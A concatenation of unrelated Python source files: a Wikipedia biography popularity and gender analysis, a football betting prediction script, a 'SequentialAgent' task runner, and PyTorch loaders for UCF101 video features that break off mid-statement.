# top_men.append(men_vals[:int(perc_men)])
# perc_women = len(women.edition_count.index) * i/100.0
# print "bottom %s percent of women are %s - mean %s - median %s"% (str(i), str(perc_women), np.mean(women_vals[:int(perc_men)]), np.median(women_vals[:int(perc_men)]))
# top_women.append(women_vals[:int(perc_women)])
# j_m += int(perc_men)
# j_w += int(perc_women)
#ut.plotTopk(top_women, top_men, ['pink', 'blue'], topk, path+'/numedition_gender_topk.png')
ut.plot_percentage(women_percentage, men_percentage, ['pink', 'blue'], range(1, max_num_editions), path+'/numedition_gender_percentage'+self.pre+"-"+self.post+'.png')
self.genderBoxplots(women, men, labels, path)
self.logfile.write("\n\n num women %s"%len(women.index))
self.logfile.write("\n num men %s"%len(men.index))
data = [women.edition_count.values, men.edition_count.values]
# Compute the qth percentile of women and men
q75 = [np.percentile(x, q=75) for x in data]
self.logfile.write("\n third quartil (75th percentile): "+str(q75))
q95 = [np.percentile(x, q=95) for x in data]
self.logfile.write("\n 95th percentile: "+str(q95))
q99 = [np.percentile(x, q=99) for x in data]
self.logfile.write("\n 99th percentile: "+str(q99))
q99_women = q99[0]
q99_men = q99[1]
self.logfile.write("\n threshold women 99th percentile: %s"%q99_women)
self.logfile.write("\n threshold men 99th percentile: %s"%q99_men)
men_percentage = 0
th = np.min(q99)
if (men.shape[0] > 0):
men_percentage = [men[men.edition_count == x].shape[0]/float(men.shape[0]) for x in range(1, int(th))]
women_percentage = 0
if (women.shape[0] > 0):
women_percentage = [women[women.edition_count == x].shape[0]/float(women.shape[0]) for x in range(1, int(th))]
ut.plot_percentage(women_percentage, men_percentage, ['pink', 'blue'], range(1, int(th)), path+'/numedition_gender_percentage'+self.pre+"-"+self.post+'_99.png')
# RANDOM BASELINE FOR RATIO
fake_ratios_norm = list()
fake_ratios = list()
for i in range(1, 1000):
#print (people.gender.value_counts())
people["random_gender"] = pd.Series(np.random.permutation(people.gender.values), index=people.index)
#print (people.random_gender.value_counts())
fake_men = people[people.random_gender =="male"]
fake_women = people[people.random_gender =="female"]
item_frequency_fake_female = itemfreq(np.array(fake_women['edition_count'].values.tolist()))
item_frequency_fake_male = itemfreq(np.array(fake_men['edition_count'].values.tolist()))
fake_ratios_norm.append(self.get_ratio(item_frequency_fake_female, item_frequency_fake_male, True))
fake_ratios.append(self.get_ratio(item_frequency_fake_female, item_frequency_fake_male, True))
item_frequency_female = itemfreq(np.array(women['edition_count'].values.tolist()))
item_frequency_male = itemfreq(np.array(men['edition_count'].values.tolist()))
ratio_norm = self.get_ratio(item_frequency_female, item_frequency_male, True)
mean_fake_ratio_norm = {}
mean_fake_ratio = {}
for key in ratio_norm.keys():
vals = []
vals_norm = []
for dic1 in fake_ratios_norm:
if key in dic1:
vals_norm.append(dic1.get(key))
mean_fake_ratio_norm[key] = np.mean(vals_norm)
for dic2 in fake_ratios:
if key in dic2:
vals.append(dic2.get(key))
mean_fake_ratio[key] = np.mean(vals)
# if we plor normalized ratio we should take the log since otherwise upper boun dis 0 but ratio can become extremly small.
#ut.plotratio(ratio_norm, mean_fake_ratio_norm, ['g','r--'], ['empirical gender', 'random gender'], self.pre+"-"+self.post, path+'/numedition_gender_ratio'+self.pre+"-"+self.post+'_norm.png', 'Num Editions', 'Male Proportion/Female Proportion', False, False)
ratio = self.get_ratio(item_frequency_female, item_frequency_male, False)
lowess = sm.nonparametric.lowess(ratio.values(), ratio.keys(), frac=0.1)
ut.plotratio(ratio, lowess, mean_fake_ratio, ['b^','g', 'r--'], ['empirical gender', 'lowess fit', 'random gender'], self.pre+"-"+self.post, path+'/numedition_gender_ratio'+self.pre+"-"+self.post+'.png', 'Num Editions', 'Male/Female', False, False)
#ratio = self.get_ratio(item_frequency_female, item_frequency_male, True)
#ut.plotline(list(ratio.keys()), list(ratio.values()), ['pink','blue'], path+'/numedition_gender_ratio'+self.pre+'_norm.png', 'Num Editions', 'Female-Male-Ratio', False, False)
#ratio = self.get_ratio(item_frequency_female, item_frequency_male, False)
#ut.plotline(list(ratio.keys()), list(ratio.values()), ['pink','blue'], path+'/numedition_gender_ratio'+self.pre+'.png', 'Num Editions', 'Female-Male-Ratio', False, False)
#ut.plot_rank_size(list([item_frequency_female[:np.max(q99)], item_frequency_male[:np.max(q99)]]), labels, ['pink','blue'], path+'/numedition_gender_ranksize_99.png', 'Rank', 'Num Editions', False, True)
#print "Mann Withney U Test Frequ Dist:"
#print stats.mstats.mannwhitneyu(item_frequency_female, item_frequency_male)
#print stats.ranksums(item_frequency_female, item_frequency_male)
ut.plot_cdf(list([item_frequency_female, item_frequency_male]), labels, ['pink','blue'], path+'/numedition_gender_ccdf'+self.pre+"-"+self.post+'.png', 'Num Editions', True, False, True)
#ut.plot_cdf(list([item_frequency_female[:np.max(q95)], item_frequency_male[:np.max(q95)]]), labels, ['pink','blue'], path+'/numedition_gender_ccdf_95.png', 'Num Editions', True, False, True)
#ut.plot_cdf(list([item_frequency_female[:np.max(q99)], item_frequency_male[:np.max(q99)]]), labels, ['pink','blue'], path+'/numedition_gender_ccdf_99.png', 'Num Editions', True, False, True)
self.logfile.write("\n\n men median(men mean), women median (women mean)")
self.logfile.write("\n "+ str(np.median(men.edition_count.values))+'('+str(np.mean(men.edition_count.values))+'), '+ str(np.median(women.edition_count.values))+'('+str(np.mean(women.edition_count.values))+')')
return {"class":classname, "median-men": np.median(men.edition_count.values), "mean-men":np.mean(men.edition_count.values), "sem-men":stats.sem(men.edition_count.values),
"sem-women":stats.sem(women.edition_count.values), "median-women":np.median(women.edition_count.values), "mean-women":np.mean(women.edition_count.values)}
def regression(self):
from statsmodels.formula.api import glm
from statsmodels.api import families
self.people.rename(columns={'class': 'dbpedia_class'}, inplace=True) # all_bios is the dataframe with the consolidated data. somehow it doesn't work if the class column is named "class"
people = self.people[(self.people.birth_century >= 0) & (self.people.birth_century <= 2000)]
m = glm("edition_count ~ C(gender,Treatment(reference='male')) + C(available_english) + C(dbpedia_class,Treatment(reference='http://dbpedia.org/ontology/Person')) + C(birth_century)",
data=people, family=families.NegativeBinomial()).fit()
print (m.summary(), file=self.logfile) # <-- this gives you the table of coefficients with p-values, confidence intervals, and so on
if __name__ == "__main__":
# analyze all data without restricting start and end by birth year
pop = GlobalWikipediaPopularity('data/consolidated_person_data.csv', -1, -1)
# pop.analyze_numlangedition_per_profession()
# pop.analyze_numlangedition_per_decade()
# select interval in which people should be born
startyears = [1900]
endyear = 2015
for year in startyears:
pop = GlobalWikipediaPopularity('data/consolidated_person_data.csv', year, endyear)
print (pop.people.shape)
pop.analyze_num_lang_edition("all", pop.people)
pop.regression()
|
<filename>src/prediction2.py<gh_stars>0
import datetime
import pandas as pd
import xgboost as xgb
from keras.models import load_model
from sklearn.externals import joblib
from fixtures import get_fixtures, get_fixtures_other
from fixtures_sportmonks import get_fixtures_sportsmonks, get_fixtures_other_sportsmonks
PATH = "C:\\Users\\Konny\\DataScience\\SpicedAcademy\\fussball_vorhersagen\\src\\"
DATE = datetime.datetime.now().strftime("%d-%m-%y")
COLS = ['H_avgGD', 'A_avgGD', 'H_avgG', 'A_avgG', 'H_avgG_c', 'A_avgG_c', 'H_avgST', 'A_avgST', 'H_avgST_c', 'A_avgST_c', 'H_avgC', 'A_avgC', 'H_avgC_c', 'A_avgC_c', 'H_GoalDiff_last', 'A_GoalDiff_last', 'H_xG_PoiMas', 'A_xG_PoiMas', 'H_Form_Tot4', 'A_Form_Tot4','H_Def_Rat', 'H_Off_Rat', 'A_Def_Rat', 'A_Off_Rat', "H_prob_odds", "D_prob_odds", "A_prob_odds", "D1", "E0", "E1", "E2", "E3", "F1", "I1", "SP1"]
def approx_goaldiff(line, ahc_home_odds):
"""
Approximates goal difference suggested by bookmaker's line and odds
"""
diff = (ahc_home_odds - 1.93) / 1.25
return round(line + diff, 2)
def get_models(df, X, prefix=""):
"""
Loads and runs the different models and returns their predictions
"""
### XGB
xgb_h = joblib.load(PATH + "model_weights\\{}xgb_h.model".format(prefix))
xgb_a = joblib.load(PATH + "model_weights\\{}xgb_a.model".format(prefix))
DMtrain = xgb.DMatrix(data=X)
xgb_hg = xgb_h.predict(DMtrain)
xgb_ag = xgb_a.predict(DMtrain)
### Lin Reg
lin_reg_h = joblib.load(PATH + "model_weights\\{}lin_reg_h.joblib".format(prefix))
lin_reg_a = joblib.load(PATH + "model_weights\\{}lin_reg_a.joblib".format(prefix))
lin_hg = lin_reg_h.predict(X)
lin_ag = lin_reg_a.predict(X)
### ANN
model = load_model(PATH + "model_weights\\{}ann_reg.h5".format(prefix))
scaler_x = joblib.load(PATH + "model_weights\\{}ann_scaler_x.joblib".format(prefix))
X_scaled = scaler_x.transform(X)
ann = model.predict(X_scaled)
scaler_y = joblib.load(PATH + "model_weights\\{}ann_scaler_y.joblib".format(prefix))
ann_preds = scaler_y.inverse_transform(ann)
ann_preds = pd.DataFrame(ann_preds, columns=["ANN_HG", "ANN_AG"])
### putting the results together
df["adj_AHC"] = approx_goaldiff(df.BbAHh, df.BbAvAHH)
df["XGB_HG"] = xgb_hg
df["XGB_AG"] = xgb_ag
df["XGB_HC_Diff"] = df["XGB_AG"] - df["XGB_HG"] - df["adj_AHC"]
df["LIN_HG"] = lin_hg
df["LIN_AG"] = lin_ag
df["LIN_HC_Diff"] = df["LIN_AG"] - df["LIN_HG"] - df["adj_AHC"]
df = pd.concat([df, ann_preds], axis=1)
df["ANN_HC_Diff"] = df["ANN_AG"] - df["ANN_HG"] - df["adj_AHC"]
df["Diff"] = round((df["ANN_HC_Diff"] + df["XGB_HC_Diff"] + df["LIN_HC_Diff"]) / 3, 2)
df["x_HG"] = (df["XGB_HG"] + df["LIN_HG"] + df["ANN_HG"]) / 3
df["x_AG"] = (df["XGB_AG"] + df["LIN_AG"] + df["ANN_AG"]) / 3
df["x_HC"] = df["x_AG"] - df["x_HG"]
df["AHC"] = df["BbAHh"]
df = df.round({"x_HG": 2, "x_AG": 2, "x_HC": 2, "HC_Diff_Avg":2})
return df
def get_predictions(save=None):
"""
Calculates predictions for the new matchday
save: if save -> saves predictions as pickle file
"""
new_matches = pd.read_csv("http://www.football-data.co.uk/fixtures.csv")
fix_date = max(pd.to_datetime(new_matches.Date, format='%d/%m/%y'))
if datetime.date.today() > fix_date.date():
print("No new matches! Come back later!\nData for new matches usually arrives Tuesday for midweek matches and friday for weekend matches.")
preds = None
bets = None
else:
print("preprocessing major leagues...")
main_leagues = get_fixtures()
if main_leagues.empty:
print("no major leagues this matchday")
else:
X_main = main_leagues[COLS]
df_main = get_models(main_leagues, X_main)
print("preprocessing minor leagues...")
other_leagues = get_fixtures_other()
if other_leagues.empty:
print("no minor leagues this matchday")
else:
X_other = other_leagues[COLS[:-8]]
df_other = get_models(other_leagues, X_other, "other_")
print("evaluating models...")
if not main_leagues.empty and not other_leagues.empty:
df = pd.concat([df_main, df_other]).reset_index(drop=True)
elif not main_leagues.empty and other_leagues.empty:
df = df_main.copy()
elif not other_leagues.empty and main_leagues.empty:
df = df_other.copy()
else:
print("There are no matches on this week")
return None, None
df.loc[df["Diff"] <= -0.15, "BET"] = "HOME " + df["AHC"].apply(str)
df.loc[df["Diff"] >= 0.15, "BET"] = "AWAY " + (-df["AHC"]).apply(str)
df.loc[abs(df["Diff"]) < 0.15, "BET"] = "------"
preds = df.loc[:,["Date", "Div", "HomeTeam", "AwayTeam", "x_HG", "x_AG", "x_HC", "AHC", "adj_AHC", "Diff", "BbAvAHH", "BbAvAHA", "BET"]]
preds = preds.rename({"BbAvAHH": "H_Odds", "BbAvAHA": "A_Odds"}, axis="columns")
bets = preds.loc[abs(preds["Diff"]) >= 0.15].reset_index(drop=True)
if save:
preds.to_pickle(PATH + f"predictions\\pkl\\prediction_{DATE}.pkl")
preds.to_excel(PATH + f"predictions\\excel\\prediction_{DATE}.xlsx")
print("Done! Good luck!")
return preds, bets
def get_predictions_sportmonks(date1, date2, save=None):
"""
Calculates predictions for the new matchday
save: if save -> saves predictions as pickle file
date format: "2018-11-16"
"""
print("preprocessing major leagues...")
main_leagues = get_fixtures_sportsmonks(date1, date2)
if main_leagues.empty:
print("no major leagues this matchday")
else:
X_main = main_leagues[COLS]
df_main = get_models(main_leagues, X_main)
print("preprocessing minor leagues...")
other_leagues = get_fixtures_other_sportsmonks(date1, date2)
if other_leagues.empty:
print("no minor leagues this matchday")
else:
X_other = other_leagues[COLS[:-8]]
df_other = get_models(other_leagues, X_other, "other_")
print("evaluating models...")
if not main_leagues.empty and not other_leagues.empty:
df = pd.concat([df_main, df_other]).reset_index(drop=True)
elif not main_leagues.empty and other_leagues.empty:
df = df_main.copy()
elif not other_leagues.empty and main_leagues.empty:
df = df_other.copy()
else:
print("There are no matches on this week")
return None, None
df.loc[df["Diff"] <= -0.15, "BET"] = "HOME " + df["AHC"].apply(str)
df.loc[df["Diff"] >= 0.15, "BET"] = "AWAY " + (-df["AHC"]).apply(str)
df.loc[abs(df["Diff"]) < 0.15, "BET"] = "------"
preds = df.loc[:,["Date", "Div", "HomeTeam", "AwayTeam", "x_HG", "x_AG", "x_HC", "AHC", "adj_AHC", "Diff", "BbAvAHH", "BbAvAHA", "BET"]]
preds = preds.rename({"BbAvAHH": "H_Odds", "BbAvAHA": "A_Odds"}, axis="columns")
bets = preds.loc[abs(preds["Diff"]) >= 0.15].reset_index(drop=True)
if save:
preds.to_pickle(PATH + f"predictions\\pkl\\prediction_{DATE}.pkl")
preds.to_excel(PATH + f"predictions\\excel\\prediction_{DATE}.xlsx")
print("Done! Good luck!")
return preds, bets
|
<gh_stars>1-10
"""SequentialAgent module."""
import copy
from multiml import logger
from multiml.agent.basic import BaseAgent
class SequentialAgent(BaseAgent):
"""Agent execute sequential tasks.
Examples:
>>> task0 = your_task0
>>> task1 = your_task1
>>> task2 = your_task2
>>>
>>> agent = SequentialAgent(storegate=storegate,
>>> task_scheduler=[task0, task1, task2],
>>> metric=your_metric)
>>> agent.execute()
>>> agent.finalize()
"""
def __init__(self,
differentiable=None,
diff_pretrain=False,
diff_task_args=None,
num_trials=None,
**kwargs):
"""Initialize sequential agent.
Args:
differentiable (str): ``keras`` or ``pytorch``. If differentiable is given,
``ConnectionTask()`` is created based on sequential tasks. If differentiable is
None (default), sequential tasks are executed step by step.
diff_pretrain (bool): If True, each subtask is trained before creating
`ConnectionTask()``.
diff_task_args (dict): arbitrary args passed to ``ConnectionTask()``.
num_trials (ine): number of trials. Average value of trials is used as final metric.
"""
if diff_task_args is None:
diff_task_args = {}
super().__init__(**kwargs)
self._result = None
self._differentiable = differentiable
self._diff_pretrain = diff_pretrain
self._diff_task_args = diff_task_args
self._num_trials = num_trials
@property
def result(self):
"""Return result of execution."""
return self._result
@result.setter
def result(self, result):
"""Set result of execution."""
self._result = result
@logger.logging
def execute(self):
"""Execute sequential agent."""
if len(self.task_scheduler) != 1:
raise ValueError('Multiple sutasks or hyperparameters are defined.')
subtasktuples = self.task_scheduler[0]
self._result = self.execute_subtasktuples(subtasktuples, 0)
@logger.logging
def finalize(self):
"""Finalize sequential agent."""
if self._result is None:
logger.warn(f'No result at finalize of {self.__class__.__name__}')
else:
header = f'Result of {self.__class__.__name__}'
names, data = self._print_result(self._result)
logger.table(header=header, names=names, data=data, max_length=40)
self.saver['result'] = self._result
def execute_subtasktuples(self, subtasktuples, counter):
"""Execute given subtasktuples."""
if self._differentiable is None:
fn_execute = self.execute_pipeline
else:
fn_execute = self.execute_differentiable
if self._num_trials is None:
return fn_execute(subtasktuples, counter)
else:
metric_values = []
for ii in range(self._num_trials):
result = fn_execute(subtasktuples, counter, ii)
metric_values.append(result['metric_value'])
result['metric_values'] = metric_values
result['metric_value'] = sum(metric_values) / len(metric_values)
return result
def execute_pipeline(self, subtasktuples, counter, trial=None):
"""Execute pipeline."""
result = {'task_ids': [], 'subtask_ids': [], 'subtask_hps': [], 'metric_value': None}
for subtasktuple in subtasktuples:
task_id = subtasktuple.task_id
subtask_id = subtasktuple.subtask_id
subtask_env = subtasktuple.env
subtask_hps = copy.deepcopy(subtasktuple.hps)
subtask_env.saver = self._saver
subtask_env.storegate = self._storegate
subtask_env.job_id = counter
subtask_env.trial_id = trial
subtask_env.set_hps(subtask_hps)
self._execute_subtask(subtasktuple)
result['task_ids'].append(task_id)
result['subtask_ids'].append(subtask_id)
result['subtask_hps'].append(subtask_hps)
self._metric.storegate = self._storegate
result['metric_value'] = self._metric.calculate()
return result
def execute_differentiable(self, subtasktuples, counter, trial=None):
"""Execute connection model."""
result = {'task_ids': [], 'subtask_ids': [], 'subtask_hps': [], 'metric_value': None}
if self._diff_pretrain:
for subtasktuple in subtasktuples:
task_id = subtasktuple.task_id
subtask_id = subtasktuple.subtask_id
subtask_env = subtasktuple.env
subtask_hps = copy.deepcopy(subtasktuple.hps)
subtask_env.saver = self._saver
subtask_env.storegate = self._storegate
subtask_env.job_id = counter
subtask_env.trial_id = trial
subtask_env.set_hps(subtask_hps)
self._execute_subtask(subtasktuple)
result['task_ids'].append(task_id)
result['subtask_ids'].append(subtask_id)
result['subtask_hps'].append(subtask_hps)
subtasks = [v.env for v in subtasktuples]
self._diff_task_args['auto_ordering'] = False
if self._differentiable == 'keras':
from multiml.task.keras import ModelConnectionTask
subtask = ModelConnectionTask(
subtasks=subtasks,
**self._diff_task_args,
)
elif self._differentiable == 'pytorch':
from multiml.task.pytorch import ModelConnectionTask
subtask = ModelConnectionTask(
subtasks=subtasks,
**self._diff_task_args,
)
else:
raise ValueError(f'differentiable: {self._differentiable} is not supported.')
from multiml.hyperparameter import Hyperparameters
from multiml.task_scheduler import subtasktuple
task_id = 'connection-' + self._differentiable
subtask_id = subtask.get_unique_id()
hps = Hyperparameters()
self._execute_subtask(subtasktuple(task_id, subtask_id, subtask, hps))
self._metric.storegate = self._storegate
metric = self._metric.calculate()
result['task_ids'].append(task_id)
result['subtask_ids'].append(subtask_id)
result['subtask_hps'].append(hps)
result['metric_value'] = metric
return result
def _execute_subtask(self, subtask, is_skip=False):
"""Execute subtask."""
subtask.env.storegate = self._storegate
subtask.env.saver = self._saver
subtask.env.execute()
subtask.env.finalize()
def _print_result(self, result):
"""Returns print result."""
metric_name = self._metric.name
names = ['task_id', 'subtask_id', 'hps', f'metric({metric_name})']
data = []
for task_id, subtask_id, subtask_hp in zip(result['task_ids'], result['subtask_ids'],
result['subtask_hps']):
if subtask_hp is None or len(subtask_hp) == 0:
data.append([task_id, subtask_id, 'no hyperparameters'])
else:
for index, (key, value) in enumerate(subtask_hp.items()):
if index == 0:
data.append([task_id, subtask_id, f'{key} = {value}'])
else:
data.append(['', '', f'{key} = {value}'])
metric_data = []
for index, idata in enumerate(data):
if index == 0:
metric_data.append(idata + [f'{result["metric_value"]}'])
else:
metric_data.append(idata + [''])
return names, metric_data
|
<gh_stars>0
import torch
import os.path as osp
import os
from torch.utils.data import Dataset
## This claas loads the feature vector for the videos and the correspoding label.
import numpy as np
from torch.autograd import Variable
import pdb
import csv
import collections
class UCF101(Dataset):
def __init__(self, dataset_name, opts):
self._ucf_dir = osp.join(opts.ucf_dir, "{}_features".format(dataset_name))
self._ignore_names = [".", ".."]
self._feature_size = opts.feature_size
self._file_names = []
self._labels = []
self.class_labels(dataset_name, opts.labels_dir)
self._labels = []
for file in os.listdir(self._ucf_dir):
if file not in self._ignore_names:
self._file_names.append(file)
video_index = self.video2index[file]
self._labels.append(self.video_labels[video_index])
self._labels = np.stack(self._labels)
self._num_classes = opts.num_classes
self._combine_startegy = opts.combine_strategy
self._segments = opts.segments
self._labels = torch.from_numpy(self._labels).float()
# self._labels = torch.Tensor(len(self._file_names), self._num_classes).float().zero_()
def __len__(self):
return len(self._file_names)
def __getitem__(self, item):
## returns the feature vector for the video
flow_features, rgb_features, numInputs = self.forward_video(item)
label = self.forward_label(item)
data = dict()
data['flow'] = flow_features
data['rgb'] = rgb_features
data['label'] = label
data['numInputs'] = numInputs
return data
def class_labels(self, name, labels_dir):
##
class2index_file = osp.join(labels_dir, 'class_dict.csv')
video2index_file = osp.join(labels_dir, 'video_indices_{}.csv'.format(name))
video2labels_file = osp.join(labels_dir, 'class_labels_{}.npy'.format(name))
self.class2index = dict()
self.video2index = dict()
self.video_labels = None
with open(class2index_file, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
self.class2index[row[0]] = int(row[1])
with open(video2index_file, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
self.video2index[row[0]] = int(row[1])
self.video_labels = np.load(video2labels_file)
def forward_label(self, index):
return Variable(self._labels[index]).cuda()
def forward_video(self, index):
filename = self._file_names[index]
flow_file = osp.join(self._ucf_dir, filename, 'features_flow.npy')
rgb_file = osp.join(self._ucf_dir, filename, 'features_rgb.npy')
flow_features = np.load(open(flow_file, 'r'))
rgb_features = np.load(open(rgb_file, 'r'))
flow_segments = np.zeros((self._segments, self._feature_size),
dtype=np.float32)
rgb_segments = np.zeros((self._segments, self._feature_size),
dtype=np.float32)
frames = flow_segments.shape[0]
segment_len = flow_features.shape[0] // self._segments + 1
total_segments = flow_features.shape[0]
numInputs = np.expand_dims(np.array([flow_features.shape[0]]), axis=0)
if self._combine_startegy == 'uniform':
for i in range(self._segments):
start = (i * segment_len)
end = (i + 1) * segment_len
seq = np.arange(start, end)
flow_segments[i, :] = np.mean(
np.take(flow_features, seq, axis=0, mode='wrap'), axis=0)
rgb_segments[i, :] = np.mean(
np.take(rgb_features, seq, axis=0, mode='wrap'), axis=0)
if self._combine_startegy == 'strat1':
offset = np.random.choice(segment_len, 1)
for i in range(self._segments):
start = (i * segment_len) + offset
end = (i + 1) * segment_len + offset
seq = np.arange(start, end)
flow_segments[i, :] = np.mean(
np.take(flow_features, seq, axis=0, mode='wrap'),
axis=0)
rgb_segments[i, :] = np.mean(
np.take(rgb_features, seq, axis=0, mode='wrap'),
axis=0)
if self._combine_startegy == 'strat2':
for i in range(self._segments):
start = (i * segment_len)
end = (i + 1) * segment_len
if segment_len > 1:
seq = np.random.choice(segment_len, int(segment_len * 0.8)) + start
else:
seq = np.arange(start, end)
flow_segments[i, :] = np.mean(
np.take(flow_features, seq, axis=0, mode='wrap'),
axis=0)
rgb_segments[i, :] = np.mean(
np.take(rgb_features, seq, axis=0, mode='wrap'),
axis=0)
if self._combine_startegy == 'strat3':
for i in range(self._segments):
sample_range = total_segments
while sample_range < self._segments + 1:
sample_range = sample_range + total_segments
sampledN = np.round(
np.linspace(0, sample_range, self._segments + 1)).astype(np.int32)
# import pdb;pdb.set_trace()
differences = sampledN[1:] - sampledN[0:-1]
randoms = np.random.rand(self._segments)
K = sampledN[0:-1] + np.round(randoms * differences).astype(np.int)
K = np.mod(K, np.ones(K.shape) * total_segments).astype(np.int)
flow_segments = flow_features[K, :]
rgb_segments = rgb_features[K, :]
## rgb_feautes are of the T depending on the length of the video.
# Each segment has 1024 dimensional feature.
flow_segments = Variable(torch.from_numpy(flow_segments).cuda())
rgb_segments = Variable(torch.from_numpy(rgb_segments).cuda())
numInputs = Variable(torch.from_numpy(numInputs))
return flow_segments, rgb_segments, numInputs
class UCF101Temporal(Dataset):
def __init__(self, dataset_name, opts):
self._ucf_dir = opts.ucf_dir
self._ucf_dir = osp.join(opts.ucf_dir, "{}_features".format(dataset_name))
self._ignore_names = [".", ".."]
self._feature_size = opts.feature_size
self._file_names = []
self._labels = []
self.class_labels(dataset_name, opts.labels_dir)
self._labels = []
self._video2segment_label = dict()
for file in os.listdir(self._ucf_dir):
if not (file in self._ignore_names):
self._file_names.append(file)
video_index = self.video2index[file]
self._labels.append(self.video_labels[video_index])
with open(os.path.join(opts.labels_dir, 'time_stamps.txt')) as f:
for line in f:
splits = line.strip().split(';')
s = []
for p in splits[1:]:
s.append((int(float(p.split(',')[0])), int(float(p.split(',')[1])),
int(p.split(',')[2])))
self._video2segment_label[splits[0]] = s
self._segment_positions_and_labels = [] # (start, end, label)
for f in self._file_names:
self._segment_positions_and_labels.append(self._video2segment_label[f])
self._labels = np.stack(self._labels)
self._num_classes = opts.num_classes
self._combine_startegy = opts.combine_strategy
self._segments = opts.segments
self._labels = torch.from_numpy(self._labels).float()
def __len__(self):
return len(self._file_names)
def __getitem__(self, item):
## returns the feature vector for the video
flow_features, rgb_features, labels, filename = self.forward_video_as_segments(
item)
data = dict()
data['flow'] = flow_features
data['rgb'] = rgb_features
data['label'] = labels
# data['video_name'] = filename
# import pdb;pdb.set_trace()
return data
def forward_video_as_segments(self, index):
filename = self._file_names[index]
flow_file = osp.join(self._ucf_dir, filename, 'features_flow.npy')
rgb_file = osp.join(self._ucf_dir, filename, 'features_rgb.npy')
flow_features = np.load(open(flow_file, 'r'))
rgb_features = np.load(open(rgb_file, 'r'))
flow_segments = []
rgb_segments = []
labels = []
segments = self._segment_positions_and_labels[index]
for s in segments:
if s[0] < rgb_features.shape[0]:
flow_segments.append(torch.from_numpy(
np.mean(flow_features[s[0]:max(s[1], s[1] + 1), :], axis=0)))
rgb_segments.append(
torch.from_numpy(
np.mean(rgb_features[s[0]:max(s[1], s[1] + 1), :], axis=0)))
labels.append(torch.Tensor([s[2]]))
return (flow_segments, rgb_segments, labels, filename)
def class_labels(self, name, labels_dir):
class2index_file = osp.join(labels_dir, 'class_dict.csv')
video2index_file = osp.join(labels_dir, 'video_indices_{}.csv'.format(name))
video2labels_file = osp.join(labels_dir, 'class_labels_{}.npy'.format(name))
self.class2index = dict()
self.video2index = dict()
self.video_labels = None
with open(class2index_file, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
self.class2index[row[0]] = int(row[1])
with open(video2index_file, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
self.video2index[row[0]] = int(row[1])
self.video_labels = np.load(video2labels_file)
def forward_label(self, index):
return Variable(self._labels[index]).cuda()
# opts should additionally have the following attrinutes
# 1. number of frames of same class, maybe 800
# 2. number of frames of different class, may be 800
# need to be sufficiently large because we want suffient number of frames to actually contain the activity
# 3. Penalize negative examples being classified as positive more? To separate the non-representative frames further
# Assuming that classification and 0/1 binary weight prediction are trained iteratively
class UCF101_modular(Dataset):
def __init__(self, dataset_name, opts):
self._ucf_dir = osp.join(opts.ucf_dir, "{}_features".format(dataset_name))
self._ignore_names = [".", ".."]
self._feature_size = opts.feature_size
self._file_names = []
self._labels = []
self.class_labels(dataset_name, opts.labels_dir)
self._labels = []
for file in os.listdir(self._ucf_dir):
if file not in self._ignore_names:
self._file_names.append(file)
video_index = self.video2index[file]
self._labels.append(self.video_labels[video_index])
self._labels = np.stack(self._labels)
self._num_classes = opts.num_classes
self._combine_startegy = opts.combine_strategy
self._segments = opts.segments
self._labels = torch.from_numpy(self._labels).float()
# self._labels = torch.Tensor(len(self._file_names), self._num_classes).float().zero_()
# parameters for independent classifer training data,
self.weight_pos = opts.weight_pos
self.weight_neg = opts.weight_neg
self._num_same = opts.num_same
self._num_diff = opts.num_diff
self._num_class_iter_per_epoch = opts.num_class_iter_per_epoch
self.label_index_dict = self.create_label_index_dict()
self.flow_features_all, self.rgb_features_all = self.read_all_features()
def __len__(self):
return self._num_class_iter_per_epoch * self._num_classes # 1 peoch is when, the network sees a class approximately N number of times
def __getitem__(self, item):
## returns the feature vector for the video
# import pdb;pdb.set_trace()
pos_class, labels, weights, flow_features, rgb_features = self.forward_video(
item)
data = dict()
data['weights'] = weights
data['labels'] = labels
data['flow_features'] = flow_features
data['rgb_features'] = rgb_features
data['pos_class'] = pos_class
return data
def class_labels(self, name, labels_dir):
##
class2index_file = osp.join(labels_dir, 'class_dict.csv')
video2index_file = osp.join(labels_dir, 'video_indices_{}.csv'.format(name))
video2labels_file = osp.join(labels_dir, 'class_labels_{}.npy'.format(name))
self.class2index = dict()
self.video2index = dict()
self.video_labels = None
with open(class2index_file, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
self.class2index[row[0]] = int(row[1])
with open(video2index_file, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
self.video2index[row[0]] = int(row[1])
self.video_labels = np.load(video2labels_file)
def forward_label(self, index):
return Variable(self._labels[index]).cuda()
def create_label_index_dict(self):
label_index_dict_pos = collections.defaultdict(list)
label_index_dict = dict()
for idx in range(len(self.video_labels)):
label = self.video_labels[idx]
cls_inds = np.where(label == 1)[0]
for j in range(len(cls_inds)):
label_index_dict_pos[cls_inds[j]].append(idx)
for j in range(self._num_classes):
pos_label_inds = label_index_dict_pos[j]
neg_label_inds = [x for x in range(len(self.video_labels)) if
x not in pos_label_inds]
label_index_dict[j] = tuple([pos_label_inds, neg_label_inds])
return label_index_dict
def read_all_features(self):
flow_features_all = []
rgb_features_all = []
for filename in self._file_names:
flow_file = osp.join(self._ucf_dir, filename, 'features_flow.npy')
rgb_file = osp.join(self._ucf_dir, filename, 'features_rgb.npy')
flow_features = np.load(open(flow_file, 'r'))
rgb_features = np.load(open(rgb_file, 'r'))
flow_features_all.append(flow_features)
rgb_features_all.append(rgb_features)
return flow_features_all, rgb_features_all
def forward_video(self, index):
# 1. randomly generate class.
# np.random.seed(0)
# index = 0
cls_index = np.random.choice(self._num_classes, 1)[0]
cls_index = 0
pos_vid_inds, neg_vid_inds = self.label_index_dict[cls_index]
# choosing with replacement 8 times
sample_pos_inds = np.random.choice(pos_vid_inds, 8)
sample_neg_inds = np.random.choice(neg_vid_inds, 12)
# sampling pos features flow
pos_features_flow = np.vstack(
[self.flow_features_all[i] for i in sample_pos_inds])
# sampling 800 from them
if len(pos_features_flow) > self._num_same:
flow_input_pos = pos_features_flow[
np.random.choice(len(pos_features_flow), self._num_same,
replace=False),
:]
else:
flow_input_pos = pos_features_flow[
np.random.choice(len(pos_features_flow), self._num_same),
:]
# clearing memory pos flow
del pos_features_flow
# sampling pos features rgb
pos_features_rgb = np.vstack(
